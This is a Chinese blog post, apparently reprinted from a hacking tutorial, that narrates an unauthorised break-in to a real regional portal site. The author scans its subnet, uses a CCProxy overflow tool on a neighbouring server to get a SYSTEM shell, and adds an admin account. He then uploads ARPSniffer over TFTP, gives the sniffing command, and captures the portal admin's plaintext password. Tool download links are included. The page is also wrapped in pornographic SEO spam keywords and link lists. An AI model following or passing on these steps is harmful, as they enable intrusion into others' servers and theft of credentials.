亚洲免费在线-亚洲免费在线播放-亚洲免费在线观看-亚洲免费在线观看视频-亚洲免费在线看-亚洲免费在线视频

巧用嗅探 玩“滲透”

系統 1918 0
? 還記得以前我利用小榕哥的WED+WIS入侵本地信息港的那篇文章嗎?自從上次入侵之后,網站的管理員想盡了辦法堵住了所有SQL注入漏洞,想通過SQL注入后臺管理頁面已經沒有可能了。真是郁悶,但是轉念一想,這正是一個練習技術的好機會,難道除了簡單的工具利用外,我就沒有其它的辦法了嗎?一定要想法子再次拿下這個站點。

 一、掃描,突現新曙光
 想來想去找不到什么好的辦法,閑著也無事,于是習慣性的用X-scan掃描了一下與本地信息港(203.207.***.2)位于同一C段的IP地址。結果在掃描到的結果中發現有許多存活主機,而且其中有一些主機好像還有系統漏洞可以利用。唉,只可惜這些主機都不是我要進攻的目標!
面對掃描出來的結果發了好久的呆,突然大腦中靈光一閃冒出了一個念頭:這些網站中說不定有某個與信息港位于同一個交換機內呢!如果我能進入控制與信息港位于同一交換機下的站點,就可以利用小榕哥的另外一個工具ARPSniffer.EXE,監聽信息港站點中的一舉一動,如果能嗅探到通過80端口傳輸到信息港的網站管理員密碼,不就成功地搞定信息港了嗎?看來方案可行!于是我開始了又一輪攻擊。

 二、利用溢出漏洞拿下第一站
 在掃描到的C段IP地址中試驗了幾個站點,第一個站點居然還有SA空口令的漏洞,可惜連接上去后發現與信息港并不在同一個交換機下。另一個站點存在Serv-U溢出漏洞,可惜也無法利用。剩下的其它網站好像看不出有什么問題來,只有一個網站(203.207.***.44)有些奇怪,在端口掃描結果中發現它好像開放了“TCP 808”端口。也不知道這個奇怪的端口是拿來做什么的(如圖1)?

圖1

巧用嗅探 玩“滲透”
于是上Google搜索了一下,呵呵,這下收獲可大了!從搜索結果了解到,原來808端口是網站中一個叫作CCProxy的軟件打開的。CCProxy是國內一個常用的代理服務器軟件,它可以輕松建立各種代理服務器,國內的許多企業都使用它代理上網,記得當初我還用它將一臺肉雞建成了一個全能的代理服務器,怎么就給忘記了呢?恰巧被掃描的網站也是一個企業站點,看來這個網站的808端口十有八九是CCProxy打開的啦。最重要的是從網上還了解到這個CCProxy代理服務器軟件剛發現了一個最新的遠程漏洞,于是趕緊下載了一個溢出程序試試(下載地址:ttp://www.nuoya.org/down/soft/CCProxy.rar)。
 (小提示:CCProxy打開的端口可能還有1080、2121等,這些是用來提供Socks和FTP服務的。)

 CCProxy溢出程序的使用非常簡單,在命令窗口中輸入“ccpx 目標IP地址 端口”,然后按提示操作即可(如圖2)。在溢出中會詢問本機是與攻擊目標位于同一個IP段;如果是在同一IP地址段中的話,直接按“y”,就可以開始溢出了;如果本機與攻擊目標不在一個IP地址段中的話,按下“n”,溢出程序將繼續提示并詢問本機是否有一個公網IP地址(如圖3),如果沒有的話,還需要手工輸入自己的網關IP地址才可以開始溢出。溢出成功后,會在當前命令窗口中自動連接攻擊目標的24876端口,獲得遠程主機的一個SYSTEM Shell。剩下來的事就是建立管理員帳號,常常的掌握這臺肉機。

圖2



巧用嗅探 玩“滲透”

圖3


巧用嗅探 玩“滲透”

三、上傳嗅探利器ARPSniffer
 現在要通過手里的肉雞入侵信息港了。首先還是要查看一下兩個網站服務器是不是位于同一個交換機下。遠程連接肉機,在肉雞的CMD窗口中輸入命令“tracert 攻擊目標IP地址”,令人興奮的是看到直接返回了目標IP地址(如圖4),現在可以確定兩臺主機都在同一交換機下了,看來有戲啦!可以考慮用嗅探的方法從肉雞上獲取信息港的管理員密碼或者其它有用的信息。現在要用到的是一個名叫“ARPSniffer.exe”的軟件(下載地址:http://admin.cnxhacker.net/Soft/uploadsoft/200409/arpsniffer.rar)。這個軟件有DOS版和WIN版,RPSniffer也是小榕哥開發的一款工具非常好的嗅探工具,它可以用在交換機的環境下。在使用這個嗅探工具前首先要使用機器上安裝WinPCAP驅動。怎么上傳ARPSniffer到肉雞上?還是老方法用TFTP傳送。在本機上運行Tfpd32,將本機建成為一個TFTP服務器,點擊界面中的“Browse”按鈕,選擇ARPSniffer下載壓縮包的解壓路徑(如圖5),然后在肉雞的命令窗口中運行“Get -i TFTP服務器IP地址 文件名”即可。在這里下載后的壓縮包中有兩個版本的程序,我們只需要上傳“arpsniffer.exe”和“WinPcap_3_0_a.exe”即可。上傳成功后先運行“WinPcap_3_0_a.exe”安裝嗅探驅動程序。


圖4



巧用嗅探 玩“滲透”

圖5

巧用嗅探 玩“滲透”

四、利用ARPSniffer滲透攻擊真正目標
 現在是萬事具備,只欠嗅探。先在命令窗口中運行“Ipconfig /all”命令,查看一下肉雞上的網址配置情況和網關IP地址(如圖6)。可以查到網關(Default Gateway)為“203.207.***.1”,運行ARPSniffer命令:
“Arpsniffer203.207.***.1203.207.***.280 c:/password.txt”;
即可開始在肉雞上監聽攻擊目標IP的80端口了(如圖7)。攻擊目標IP上所有通過80端口收發的密碼將被保存在“Password.txt”文件中。在嗅探時需要注意,如果在肉雞上安裝有兩塊網卡的話,還要在剛才的Arpsniffer命令后加上數字參數指定嗅探的網卡ID。

圖6



巧用嗅探 玩“滲透”


圖7

巧用嗅探 玩“滲透”


(小提示:當然我們也可以嗅探其它的端口,如21和25端口等獲得Telnet密碼。但是由于管理員以Web方式登錄的幾率較大些,所以我們選擇了嗅探80Web端口。)

 五、獲得管理員密碼
 最后剩下來的事情就是坐著等待攻擊目標網站上的管理員登錄了。很快就看到了肉雞上的命令窗口中有了反應,打開“password.txt”就可以看到密碼。不過由于我們還在監聽過程中,所以“password.txt”文件是無法直接打開的,而且也不能復制。想要查看密碼記錄文件,必須先終止嗅探進程。可以在肉雞嗅探窗口中直接按下“Ctrl+C”鍵,就可以中止嗅探了。不過可能同時也會將我們在本機與肉雞建立的連接窗口關閉掉了。結束后看一看,呵呵,真的有收獲啦,網站管理的密碼都以明文的方式保存在文本里面啦!現在還等什么呢?又可以以管理員身份登入信息港故地重游啦!

巧用嗅探 玩“滲透”


更多文章、技術交流、商務合作、聯系博主

微信掃碼或搜索:z360901061

微信掃一掃加我為好友

QQ號聯系: 360901061

您的支持是博主寫作最大的動力,如果您喜歡我的文章,感覺我的文章對您有幫助,請用微信掃描下面二維碼支持博主2元、5元、10元、20元等您想捐的金額吧,狠狠點擊下面給點支持吧,站長非常感激您!手機微信長按不能支付解決辦法:請將微信支付二維碼保存到相冊,切換到微信,然后點擊微信右上角掃一掃功能,選擇支付二維碼完成支付。

【本文對您有幫助就好】

您的支持是博主寫作最大的動力,如果您喜歡我的文章,感覺我的文章對您有幫助,請用微信掃描上面二維碼支持博主2元、5元、10元、自定義金額等您想捐的金額吧,站長會非常 感謝您的哦!!!

發表我的評論
最新評論 總共0條評論
主站蜘蛛池模板: 狠狠的操你 | 国产a精品 | 天天艹| 国产精品小视频在线观看 | 日韩久久一区二区三区 | 人做人爱视频欧美在线观看 | 成人日韩欧美 | 亚洲性夜夜综合久久麻豆 | 婷婷在线视频观看 | 九九热视频在线观看 | 日韩中文一区 | 成人午夜大片免费视频77777 | 色中文在线 | 好看的中文字幕在线 | 免费视频网站在线观看黄 | 亚洲国产综合人成综合网站00 | 国产成人精品s8sp视频 | 欧美日韩国产成人综合在线 | 欧美成人亚洲国产精品 | 一级毛片免费在线播放 | 欧美洲久久日韩欧美 | 免费一级欧美片片线观看 | 久草在线观看首页 | 国产精品亚洲欧美一级久久精品 | 在线亚洲国产精品区 | 午夜宅男在线观看 | 日本一级毛片高清免费观看视频 | 久久国产精品久久 | 久久精品视频一区 | 亚洲视频一二区 | 国产人做人爱免费视频 | 久久日韩精品 | 亚洲高清国产一区二区三区 | 一级毛片在线播放免费 | 国产伦精品一区二区三区在线观看 | 亚洲精品色播一区二区 | 成年黄页免费大全网站 | 国产日韩欧美中文 | 国产在线精品成人一区二区三区 | 久久精品只有这里有 | 欧美性爰视频 |